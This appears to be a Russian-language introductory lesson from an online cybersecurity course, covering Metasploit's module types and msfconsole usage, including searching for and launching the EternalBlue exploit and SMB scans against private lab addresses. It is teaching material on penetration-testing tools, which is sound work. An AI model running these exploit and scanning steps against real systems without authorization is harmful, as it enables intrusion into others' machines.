Архитектура Metasploit и msfconsole
Освойте навигацию в msfconsole, структуру эксплойтов, полезных нагрузок и модулей, а также настройку параметров.
«Архитектура Metasploit и msfconsole» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 1 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Что такое Metasploit
Metasploit Framework — это платформа с открытым исходным кодом для тестирования на проникновение, которая предоставляет единый интерфейс для разработки, проверки и выполнения эксплойтов. Это отраслевой стандарт для санкционированной эксплуатации в лабораторных средах.
Компоненты Metasploit
Основные компоненты: msfconsole (интерактивный CLI), msfvenom (генератор полезной нагрузки), Metasploit DB (PostgreSQL для хранения узлов и сеансов) и Armitage (графическая интерфейсная оболочка).
Запуск msfconsole
Запустите msfconsole и инициализируйте базу данных. Приглашение командной строки изменится на msf6 >. Автодополнение по клавише Tab работает для всех команд, имён модулей и параметров.
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.Типы модулей
Metasploit организует возможности в следующие типы модулей: exploit (код атаки для конкретной уязвимости), payload (код, выполняемый после эксплуатации), auxiliary (сканеры и фаззеры), post (постэксплуатация), encoder (кодировщик) и nop.
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesПоиск модулей
Команда search фильтрует модули по имени, CVE, платформе или рейтингу. Рейтинг модуля показывает его надёжность: Excellent > Great > Good > Normal > Average > Low.
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17Использование модуля эксплойта
Выберите модуль с помощью use, просмотрите обязательные параметры с помощью show options, задайте значения с помощью set, а затем запустите модуль с помощью run или exploit.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runНастройка глобальных параметров
setg задаёт параметры глобально для всех последующих модулей — это удобно для LHOST, LPORT и RHOSTS, которые остаются неизменными на протяжении всей работы.
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTВспомогательные модули
Вспомогательные модули выполняют сканирование, сбор сведений и фаззинг без доставки полезной нагрузки. Примеры: сканер версии SMB, перебор паролей для входа по SSH и сканер каталогов HTTP.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runУправление рабочими пространствами
Рабочие пространства организуют данные сканирования и сеансы для каждого задания. В начале каждой проверки создавайте новое рабочее пространство, чтобы хранить данные отдельно.
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesИнтеграция с Nmap
Импортируйте результаты сканирования Nmap в формате XML непосредственно в базу данных Metasploit, чтобы заполнить таблицы узлов и служб и обеспечить выбор целевых модулей.
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445Справка и документация
У каждого модуля есть встроенная документация. Используйте info, чтобы прочитать описание модуля, рейтинг надёжности, ссылки на источники (CVE и рекомендации по безопасности), а также обязательные параметры.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rankБыстрая проверка
Какая команда выбирает модуль в msfconsole?
Итоги: архитектура Metasploit
msfconsole — центральный узел: здесь выполняется поиск модулей, задаются параметры, запускаются эксплойты и управляются сеансы. Всегда работайте в именованном рабочем пространстве, импортируйте результаты Nmap для заполнения базы данных и читайте информацию о модуле перед запуском — понимайте, что именно и зачем вы выполняете.
Часто задаваемые вопросы
Урок «Архитектура Metasploit и msfconsole» бесплатный?
Да — полный текст урока «Архитектура Metasploit и msfconsole» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Архитектура Metasploit и msfconsole»?
Освойте навигацию в msfconsole, структуру эксплойтов, полезных нагрузок и модулей, а также настройку параметров. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 1 из 4.
Сколько времени занимает урок «Архитектура Metasploit и msfconsole»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Архитектура Metasploit и msfconsole
- Эксплуатация известной уязвимости
- Полезные нагрузки: поэтапные и цельные, Meterpreter
- Постэксплуатация: перемещение и закрепление